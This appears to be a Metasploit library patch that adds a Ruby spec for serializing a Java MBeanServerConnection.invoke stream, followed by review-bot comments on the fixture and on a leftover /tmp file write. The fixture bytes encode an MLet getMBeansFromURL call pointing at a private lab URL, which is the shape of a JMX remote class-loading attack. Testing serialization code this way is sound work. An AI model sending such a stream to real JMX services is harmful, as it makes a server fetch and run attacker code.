From a5ae2aadeedebc4f546ffa45f31c2548069de53f Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Wed, 14 Jan 2015 11:44:39 -0600
Subject: [PATCH] Add spec for MBeanServerConnection.invoke stream
---
 .../java/serialization/model/stream_spec.rb | 154 ++++++++++++++++++
 1 file changed, 154 insertions(+)
diff --git a/spec/lib/rex/java/serialization/model/stream_spec.rb b/spec/lib/rex/java/serialization/model/stream_spec.rb
index 52e2c47884..05664985c5 100644
--- a/spec/lib/rex/java/serialization/model/stream_spec.rb
+++ b/spec/lib/rex/java/serialization/model/stream_spec.rb
@@ -142,6 +142,33 @@ describe Rex::Java::Serialization::Model::Stream do "\x2c\x69\x64\x3d\x31\x78\x70" end + let(:mbean_invoke) do + "\xac\xed\x00\x05\x77\x22\xe3\xba\xbd\x14\xa0\x0e\x72\x74\x4a\x7d" + + "\x3f\x10\x00\x00\x01\x4a\xe3\xed\x2f\x53\x81\x2e\xff\xff\xff\xff" + + "\x13\xe7\xd6\x94\x17\xe5\xda\x20\x73\x72\x00\x1b\x6a\x61\x76\x61" + + "\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a" + + "\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03" + + "\x00\x00\x70\x78\x70\x74\x00\x17\x44\x65\x66\x61\x75\x6c\x74\x44" + + "\x6f\x6d\x61\x69\x6e\x3a\x74\x79\x70\x65\x3d\x4d\x4c\x65\x74\x78" + + "\x74\x00\x10\x67\x65\x74\x4d\x42\x65\x61\x6e\x73\x46\x72\x6f\x6d" + + "\x55\x52\x4c\x73\x72\x00\x19\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e" + + "\x4d\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x4f\x62\x6a\x65\x63\x74" + + "\x7c\xbd\x1e\x97\xed\x63\xfc\x3e\x02\x00\x03\x49\x00\x04\x68\x61" + + "\x73\x68\x5b\x00\x08\x6c\x6f\x63\x42\x79\x74\x65\x73\x74\x00\x02" + + "\x5b\x42\x5b\x00\x08\x6f\x62\x6a\x42\x79\x74\x65\x73\x71\x00\x7e" + + "\x00\x05\x70\x78\x70\x72\x69\x21\xc6\x70\x75\x72\x00\x02\x5b\x42" + + "\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x70\x78\x70\x00\x00" + + "\x00\x4e\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61" + + "\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58" + + "\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00" + + "\x1f\x68\x74\x74\x70\x3a\x2f\x2f\x31\x37\x32\x2e\x31\x36\x2e\x31" + + "\x35\x38\x2e\x31\x33\x32\x3a\x34\x31\x34\x31\x2f\x6d\x6c\x65\x74" + + "\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e" + + "\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02" + + "\x00\x00\x70\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61" + + "\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x70" + end + describe ".new" do it "Rex::Java::Serialization::Model::Stream" do expect(stream).to be_a(Rex::Java::Serialization::Model::Stream) 
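Review bot: The `mbean_invoke` fixture has no comment saying what the bytes encode, so a reader has to decode the hex by hand to learn that it carries a serialized `java.rmi.MarshalledObject` and a hard-coded URL. Decoding the visible bytes gives `http://172.16.158.132:4141/mlet`, a private-range address that looks like it came from a lab capture. I would put a comment above the `let`, for example `# Captured MBeanServerConnection.invoke arguments: ObjectName 'DefaultDomain:type=MLet', operation 'getMBeansFromURL', MarshalledObject wrapping a lab-only URL (private address)`. Anyone auditing the repository for embedded endpoints or serialized payloads can then tell at a glance that this is inert test data. The enclosing `describe` block starts and ends outside this hunk.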
@@ -384,6 +411,133 @@ describe Rex::Java::Serialization::Model::Stream do end end + + context "when serializing a MBeanServerConnection.invoke call data" do + it "serializes the stream correctly" do + block_data = Rex::Java::Serialization::Model::BlockData.new + block_data.contents = "\xe3\xba\xbd\x14\xa0\x0e\x72\x74\x4a\x7d\x3f\x10\x00\x00\x01\x4a\xe3\xed\x2f\x53\x81\x2e" + block_data.contents << "\xff\xff\xff\xff\x13\xe7\xd6\x94\x17\xe5\xda\x20" + block_data.length = block_data.contents.length + + stream.contents << block_data + + new_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new + new_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'javax.management.ObjectName') + new_class_desc.serial_version = 0xf03a71beb6d15cf + new_class_desc.flags = 3 + new_class_desc.fields = [] + new_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new + new_class_desc.class_annotation.contents = [ + Rex::Java::Serialization::Model::NullReference.new, + Rex::Java::Serialization::Model::EndBlockData.new + ] + new_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new + new_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new + + new_object = Rex::Java::Serialization::Model::NewObject.new + new_object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new + new_object.class_desc.description = new_class_desc + new_object.class_data = [] + + stream.contents << new_object + stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'DefaultDomain:type=MLet') + stream.contents << Rex::Java::Serialization::Model::EndBlockData.new + + stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'getMBeansFromURL') + + marshall_object_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new + marshall_object_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.rmi.MarshalledObject') + marshall_object_class_desc.serial_version = 
0x7cbd1e97ed63fc3e + marshall_object_class_desc.flags = 2 + marshall_object_class_desc.fields = [ + Rex::Java::Serialization::Model::Field.new, + Rex::Java::Serialization::Model::Field.new, + Rex::Java::Serialization::Model::Field.new + ] + + marshall_object_class_desc.fields[0].type = 'int' + marshall_object_class_desc.fields[0].name = Rex::Java::Serialization::Model::Utf.new(nil, 'hash') + + marshall_object_class_desc.fields[1].type = 'array' + marshall_object_class_desc.fields[1].name = Rex::Java::Serialization::Model::Utf.new(nil, 'locBytes') + marshall_object_class_desc.fields[1].field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B') + + marshall_object_class_desc.fields[2].type = 'array' + marshall_object_class_desc.fields[2].name = Rex::Java::Serialization::Model::Utf.new(nil, 'objBytes') + marshall_object_class_desc.fields[2].field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B') + + marshall_object_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new + marshall_object_class_desc.class_annotation.contents = [ + Rex::Java::Serialization::Model::NullReference.new, + Rex::Java::Serialization::Model::EndBlockData.new + ] + marshall_object_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new + marshall_object_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new + + + data_binary_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new + data_binary_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, '[B') + data_binary_class_desc.serial_version = 0xacf317f8060854e0 + data_binary_class_desc.flags = 2 + data_binary_class_desc.fields = [] + data_binary_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new + data_binary_class_desc.class_annotation.contents = [ + Rex::Java::Serialization::Model::NullReference.new, + Rex::Java::Serialization::Model::EndBlockData.new + ] + data_binary_class_desc.super_class = 
Rex::Java::Serialization::Model::ClassDesc.new + data_binary_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new + + data_binary = Rex::Java::Serialization::Model::NewArray.new + data_binary.array_description = Rex::Java::Serialization::Model::ClassDesc.new + data_binary.array_description.description = data_binary_class_desc + data_binary.type = 'byte' + # TODO: look into it + data_binary.values = [-84, -19, 0, 5, 117, 114, 0, 19, 91, 76, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 79, 98, 106, 101, 99, 116, 59, -112, -50, 88, -97, 16, 115, 41, 108, 2, 0, 0, 120, 112, 0, 0, 0, 1, 116, 0, 31, 104, 116, 116, 112, 58, 47, 47, 49, 55, 50, 46, 49, 54, 46, 49, 53, 56, 46, 49, 51, 50, 58, 52, 49, 52, 49, 47, 109, 108, 101, 116] + + marshall_object = Rex::Java::Serialization::Model::NewObject.new + marshall_object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new + marshall_object.class_desc.description = marshall_object_class_desc + marshall_object.class_data = [ + ["int", 1919492550], + Rex::Java::Serialization::Model::NullReference.new, + data_binary + ] + + stream.contents << marshall_object + + new_array_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new + new_array_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, '[Ljava.lang.String;') + new_array_class_desc.serial_version = 0xadd256e7e91d7b47 + new_array_class_desc.flags = 2 + new_array_class_desc.fields = [] + new_array_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new + new_array_class_desc.class_annotation.contents = [ + Rex::Java::Serialization::Model::NullReference.new, + Rex::Java::Serialization::Model::EndBlockData.new + ] + new_array_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new + new_array_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new + + new_array = Rex::Java::Serialization::Model::NewArray.new + new_array.array_description = 
Rex::Java::Serialization::Model::ClassDesc.new + new_array.array_description.description = new_array_class_desc + new_array.type = 'java.lang.String;' + new_array.values = [ + Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String') + ] + + stream.contents << new_array + + stream.contents << Rex::Java::Serialization::Model::NullReference.new + + f = File.new('/tmp/test.bin', 'wb') + f.write(stream.encode) + f.close + + expect(stream.encode).to eq(mbean_invoke) + end + end end end \ No newline at end of file
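Review bot: The three lines `f = File.new('/tmp/test.bin', 'wb')`, `f.write(stream.encode)` and `f.close` just before the final `expect` look like leftover debugging and should be removed. As written, every spec run truncates and writes a fixed, predictable path in a world-writable directory, so on a shared build host a pre-placed symlink at that path gets followed; the spec also fails where `/tmp` does not exist and leaks the handle if `write` raises. If a dump is useful during development, `Tempfile` or the block form of `File.open` on a path inside a private directory is the safer shape, and it should not be committed. Separately, `# TODO: look into it` above `data_binary.values` would help more if it named the open question, e.g. `# TODO: values are signed bytes of a nested serialized stream (starts with the 0xaced magic); model it as a Stream instead of a raw array`.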